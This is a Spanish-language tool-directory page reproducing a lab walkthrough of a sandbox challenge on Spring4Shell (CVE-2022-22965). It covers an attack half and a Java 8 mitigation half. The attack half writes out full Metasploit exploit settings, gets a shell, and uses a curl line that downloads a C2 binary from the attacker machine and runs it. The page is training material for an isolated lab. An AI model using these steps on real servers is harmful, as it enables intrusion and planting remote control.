Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingLabs y Práctica
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

Guía paso a paso de la explotación de CVE-2022-22965 (Spring4Shell) con Metasploit, implementación de un listener C2 y mitigación de la vulnerabilidad mediante la degradación a Java 8 en un servidor Tomcat.

Ver Repositorio
14hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Sandbox de Amenaza Spring4Shell (CVE-2022-22965)

Resumen

Este tutorial documenta la finalización del Desafío Sandbox centrado en CVE-2022-22965, comúnmente conocido como Spring4Shell — una vulnerabilidad crítica (CVSS 9.8/10) de ejecución remota de código que afecta versiones específicas del framework Spring Java. El desafío cubre tanto perspectivas ofensivas (equipo rojo) como defensivas (equipo azul) de la vulnerabilidad.

Nota: Los comandos y rutas de archivo en este tutorial reflejan el entorno específico utilizado durante este intento. Su entorno puede diferir — ajuste las rutas, direcciones IP y nombres de archivo según corresponda.


Entorno

MáquinaDirección IPRol
Security-Desk (Kali Linux)172.16.200.12Máquina de ataque y trabajo
Red Target (Linux)172.16.100.90Objetivo de explotación
Blue Target (Linux)172.16.100.100Objetivo de endurecimiento

Credenciales: playerone / password123


Objetivo del Equipo Rojo: Desplegar Listener C2 en Red Target

Paso 1 — Identificar el Objetivo

Revisé la pestaña Mapa de Red en el panel del desafío para confirmar la IP del Red Target (172.16.100.90). Usé curl para inspeccionar la aplicación web ejecutándose en el puerto 80:

root@kitploit:~
curl http://172.16.100.90

La salida reveló Apache Tomcat 9.0.59 con una redirección a /dasmsp. Examiné el código fuente de la página para identificar un endpoint de formulario POST en /dasmsp/contact.

Paso 2 — Iniciar Metasploit y Configurar el Exploit

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

El exploit generó exitosamente un shell JSP, modificó el cargador de clases, vació el archivo de registro y abrió una sesión de shell de comandos en el Red Target.

Paso 3 — Obtener un Shell Interactivo

Después de que se abrió la sesión, ingresé shell para actualizar a un shell interactivo. Metasploit localizó /usr/bin/script en el objetivo y lo usó para lanzar un shell interactivo como el usuario tomcat.

Paso 4 — Transferir y Ejecutar deploy_c2

El binario deploy_c2 estaba ubicado en Security-Desk, no en el Red Target. Lo alojé mediante un servidor HTTP Python3 en Security-Desk:

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

Lo descargué y ejecuté desde la sesión de shell del Red Target:

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

La salida confirmó: Done! — El listener C2 se desplegó exitosamente en el Red Target.


Objetivo del Equipo Azul: Mitigar CVE-2022-22965 en Blue Target (Degradar a Java 8)

Paso 1 — Conectar por SSH al Blue Target

Desde la terminal de Security-Desk:

root@kitploit:~
ssh [email protected]

Contraseña: password123

Paso 2 — Transferir Paquetes de Java 8 al Blue Target

Los paquetes .deb de Java 8 estaban ubicados en Security-Desk en /home/playerone/Desktop/Resources/. Los transferí al Blue Target usando SCP desde una terminal de Security-Desk:

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

Paquetes transferidos:

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

Paso 3 — Instalar Paquetes de Java 8

En la sesión SSH del Blue Target:

root@kitploit:~
sudo dpkg -i /tmp/*.deb

Paso 4 — Establecer Java 8 como Predeterminado (Solución de Problema Conocido)

Debido a un problema conocido del desafío, la verificación no se registra correctamente sin establecer manualmente Java 8 como predeterminado:

root@kitploit:~
sudo update-alternatives --config java

Seleccioné la opción 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java.

Paso 5 — Actualizar el Servicio Tomcat para Usar Java 8

Inspeccioné el archivo de unidad del servicio Tomcat:

root@kitploit:~
cat /etc/systemd/system/tomcat.service

Edité el archivo para actualizar la variable de entorno JAVA_HOME:

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

Cambié:

root@kitploit:~
Environment="JAVA_HOME=/usr"

A:

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

Paso 6 — Recargar y Reiniciar Tomcat

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

La verificación de CVE-2022-22965 Mitigado en Blue Target se volvió verde en el panel del desafío.


Herramientas Utilizadas

  • Metasploit Framework (spring_framework_rce_spring4shell module)
  • curl
  • Python3 HTTP Server
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
Descargar herramienta